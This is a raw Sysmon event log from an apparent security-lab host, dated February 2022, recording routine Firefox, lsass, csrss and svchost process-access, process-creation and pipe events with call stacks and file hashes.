Firefox\xul.dll+1205b3f|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000288073Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:26.129{C8EA50B7-11AA-6216-1605-000000003802}2228\gecko-crash-server-pipe.2228C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000288072Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.114{C8EA50B7-11AA-6216-1605-000000003802}22286132C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AE-6216-1A05-000000003802}3544C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2bd60|C:\Program Files\Mozilla Firefox\xul.dll+e38a9d|C:\Program Files\Mozilla Firefox\xul.dll+e32cb9|C:\Program Files\Mozilla Firefox\xul.dll+e23ae1|C:\Program Files\Mozilla Firefox\xul.dll+e31d78|C:\Program Files\Mozilla Firefox\xul.dll+7c6644|C:\Program Files\Mozilla Firefox\xul.dll+19c76f6|C:\Program Files\Mozilla Firefox\xul.dll+168da29|C:\Program Files\Mozilla Firefox\xul.dll+19ee82f|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+249ae|C:\Program Files\Mozilla Firefox\xul.dll+18db08|C:\Program Files\Mozilla Firefox\xul.dll+18ca0f|C:\Program Files\Mozilla Firefox\xul.dll+43f0b91|C:\Program Files\Mozilla Firefox\xul.dll+445b03b|C:\Program Files\Mozilla Firefox\xul.dll+445be29|C:\Program Files\Mozilla Firefox\xul.dll+1f9ac83|C:\Program Files\Mozilla Firefox\firefox.exe+9dd0|C:\Program Files\Mozilla Firefox\firefox.exe+1ca08|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288071Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-11AA-6216-1605-000000003802}22285412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AE-6216-1A05-000000003802}3544C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+99a30f|C:\Program Files\Mozilla Firefox\xul.dll+7c6644|C:\Program Files\Mozilla Firefox\xul.dll+19e466f|C:\Program Files\Mozilla Firefox\xul.dll+12ac5|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+126a7|C:\Program Files\Mozilla Firefox\xul.dll+9822f1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288070Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288069Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288068Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288067Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288066Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-11AE-6216-1A05-000000003802}3544C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000288065Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-11AA-6216-1605-000000003802}22282268C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AE-6216-1A05-000000003802}3544C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+189bf|C:\Program Files\Mozilla Firefox\firefox.exe+30cfd|C:\Program Files\Mozilla Firefox\firefox.exe+2ff25|C:\Program Files\Mozilla Firefox\xul.dll+2052e4a|C:\Program Files\Mozilla Firefox\xul.dll+9962fe|C:\Program Files\Mozilla Firefox\xul.dll+9944b5|C:\Program Files\Mozilla Firefox\xul.dll+99b13e|C:\Program Files\Mozilla Firefox\xul.dll+83253d|C:\Program Files\Mozilla Firefox\xul.dll+168dd89|C:\Program Files\Mozilla Firefox\xul.dll+168c88a|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+249ae|C:\Program Files\Mozilla Firefox\xul.dll+8357fb|C:\Program Files\Mozilla Firefox\nss3.dll+68dc|C:\Program Files\Mozilla Firefox\nss3.dll+90731|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000288064Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.105{C8EA50B7-11AE-6216-1A05-000000003802}3544C:\Program Files\Mozilla Firefox\firefox.exe97.0.1FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2228.5.1642238060\2019035283" -childID 3 -isForBrowser -prefsHandle 4104 -prefMapHandle 4112 -prefsLen 5798 -prefMapSize 251484 -jsInitHandle 976 -jsInitLen 279340 -parentBuildID 20220216172458 -appDir "C:\Program Files\Mozilla Firefox\browser" - 2228 "\\.\pipe\gecko-crash-server-pipe.2228" 4124 157e8db7248 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32LowMD5=47024075D8FB7B85F0B6615FFB0E87A5,SHA256=FE842C526ABBEE926C9CFE27F45AE3BC20F5614878120A9150B1A2DDA1CD226D,IMPHASH=FAFFE564A2DAFFCCC4A6BE71D34C1748{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 10341000x8000000000000000288063Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288062Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288061Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288060Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288059Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288058Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288057Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288056Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288055Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288054Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288053Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288052Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288051Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288050Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.098{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288049Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 